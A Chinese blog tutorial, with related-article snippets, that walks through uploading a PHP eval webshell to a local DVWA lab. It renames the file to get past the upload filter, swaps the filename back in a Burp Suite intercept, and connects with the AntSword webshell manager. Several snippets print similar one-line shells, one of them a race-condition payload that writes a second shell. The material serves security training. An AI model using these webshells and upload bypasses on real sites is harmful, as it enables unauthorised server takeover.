中国蚁剑+burpsuite+webshell文件上传(超完整)

最新推荐文章于 2024-05-01 21:00:11 发布
最新推荐文章于 2024-05-01 21:00:11 发布
阅读量2.5k 收藏 15
点赞数 3
文章标签: web安全 安全性测试 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50953689/article/details/124774526
版权

之前:需要打开phpstudy的靶场环境

第一步

➊准备木马文件 新建木马文件ttx.php,文件内容为

<?php @eval($_REQUEST["shell"]); ?>

➋保存后,将文件后缀名php改为jpg

➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块

➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upload’,在burpsuite中看到拦截的请求,将文件名修改为为shell.php后,放包

➎在文件上传处发现提示上传成功

➏使用工具,蚁剑shell管理工具

操作如下,填写添加url(第4步上传的ttx.php文件路径)http://127.0.0.1/DVWA-master/hackable/uploads/shell.php 填写连接密码(第①步php文件中双引号的内容)shell 其它默认设置,然后点击测试连接,提示连接成功,点击‘添加’或‘保存’,完成

➐已经获取了web的权限,可以使用蚁剑的其它功能做更多的操作

 

 

bfftalking
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传webshell,利用获取flag
weixin_50644630的博客
09-14 2922
一、上传webshell 1创建一个文件,并命名为webshell 文件代码如下 <?php @eval($_POST['shell']);?> 2登陆后台,上传文件wenshell.php 进入附件管理,上传文件 在前台找到文件 点击常用文件,找到自己上传的文件 找到文件的目录 二、利用获取flag 在中添加URL,并填入密码 进入查看文件内容,找到flag ...
文件上传漏洞
vvvlp的博客
11-08 2079
使用
CTFHub-Web-文件上传
最新发布
IceCream的博客
05-01 1077
1.编写一段PHP木马脚本2.将编写好的木马进行上传3.显示上传成功了4.使用文件上传工具进行尝试5.连接成功进入文件管理6.上翻目录找到flag文件7.打开文件查看flag。
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版
安全汪
10-28 1万+
Burpsuite改包上传拿webshell,抓包上传拿webshell详细版  很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。   在后台上传图片的地方添加xxx.jpg 图片   打开burpsiute​ 进入proxy后进
Burpsuite配合利用条件竞争
多喝i热水的博客
01-28 1204
目录 破解思路 绕过过程 打开pyhon脚本 打开Burpsuite 上传文件成功并连接 结合upload-labs-Pass18 破解思路 存在条件竞争漏洞,大概意思就是如果能在上传的一句话木马被删除之前访问成功了,那么就可以拿shell了 绕过过程 不断上传文件,在文件还没被删除前去读取文件, 若上传内容为<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST["pass"])?>');?>, 则还没被删
安全burpsuite暴力破解并上传webshell
qq_43017750的博客
10-14 2513
1.侦察环境 目标网站URL:http://192.168.0.141/DVWA/login.php 2.尝试弱口令并抓包 用户名:admin,密码:123,发现登录失败 在burpsuite的Proxy下的HTTP history中找到最近的一条POST记录,右键[Send to Intruder]。 3.配置攻击参数 打开[Intruder/2/Positions],Attack type:[Sniper],点击<clear$>,并在password处添加标记 在[Payloads/
【网络安全文件上传漏洞及中国蚁剑安装
边缘拼命划水的小陈
04-11 1728
加载器咱们下载win64版本(往下滑找到下载地址)》初始化时选择antSword_masster文件夹。》点击antSword.exe,进行初始化。成功拿到shell权限,入侵成功。
Kali+Burpsuite+Openvas+DAWA安装手册.docx
05-28
这几天一直在弄渗透测试的环境搭建及攻防的练习,磕磕绊绊两天时间终于把测试环境搭建好了(包括Kali+Burpsuite+Openvas+DAWA)。顺便记录了一下整个搭建及测试的过程(适合小白使用),我把一些用到的环境及软件也都...
配置Frida+BurpSuite+Genymotion 绕过Android
03-31
配置Frida+BurpSuite+Genymotion, 绕过Android SSL Pinning-Configuring Frida with BurpSuite and Genymotion to bypass SSL Pinning
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
Burpsuite+1.7.26+Unlimited.rar
08-13
Burpsuite+1.7.26+Unlimited.rarBurpsuite+1.7.26+Unlimited.rar
webshell批量爆破工具
01-19
webshell批量爆破工具 ftp破解、外链全发、网站优化必不可少的软件,用了你就知道,
Burpsuite插件之logger++使用方法1
08-03
Burpsuite 插件-logger++使用方法By:裁决目录跟 http history 差不过,记录的更加全面了,字段也多了几个正常开代理就行,不用管,跟
上传webshell(入侵目标页面主机靶机演示)
weixin_45571987的博客
09-14 1980
上传webshell新手演示写好一句话木马寻找页面上传点(上传木马)寻找上传后的文件位置(绝对路径)连接上目标主机找到目标flag 写好一句话木马 <?php eval(@$_POST['shell']); ?> webshell的分类 ①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php 写成php形式 寻找页面上传点(上传木马) 在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录
攻防世界webweb shell关卡使用中国蚁剑
Lu__xiao的博客
11-30 866
访问web shell关卡进入此网站,得到下面一句话 打开,右击空白,添加数据 URL 填写网站地址 密码shell 点击添加 连接后在网站目录下可以看到 flag.txt文件 里面放置flag index.php文件 里面放置网站源代码 源代码 flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c} webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...
+DVWA(文件上传漏洞Upload)
初学者L_言的博客
10-30 5917
+DVWA(文件上传漏洞Upload) 工具 虚拟机:owasp-bwa 主机:windows10 AntSword 文件上传漏洞(Upload) 第一步:登入DVWA 注:这里使用的是low等级,毕竟目的是演示如何的连接 第二步:准备hack.php <?php @eval($_POST['hack']) ?> 第三步:从DVWA上传hack.php 显示上传成功!...
渗透测试-burpsuitewebshell 穷举破解密码
MMei的博客
09-26 84
bp对webshell穷举破解密码
BurpSuite抓包改包上传
热门推荐
myths_0的专栏
02-15 1万+
http://sec.chinabyte.com/464/12671464.shtml Burp suite是由portswigger开发的一套用于Web渗透测试的集成套件,它包含了spider,scanner(付费版 本),intruder,repeater,sequencer,decoder,comparer等模块,每个模块都有其独特的用途,给专业和非专业的Web渗透测试人员
一、文件上传漏洞 低、中、高三级别 详解
Hala
04-16 1727
一、文件上传漏洞 项目实验环境 OWASP Broken Web Apps VM v1.2 靶场
代理搭配burpsuite
09-07
代理可以与Burp Suite搭配使用。是一款开源的跨平台网站管理工具,而Burp Suite是用于攻击web应用程序的集成平台。通过将代理设置为Burp Suite的代理,可以将所有的HTTP流量导入到Burp Suite进行分析和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值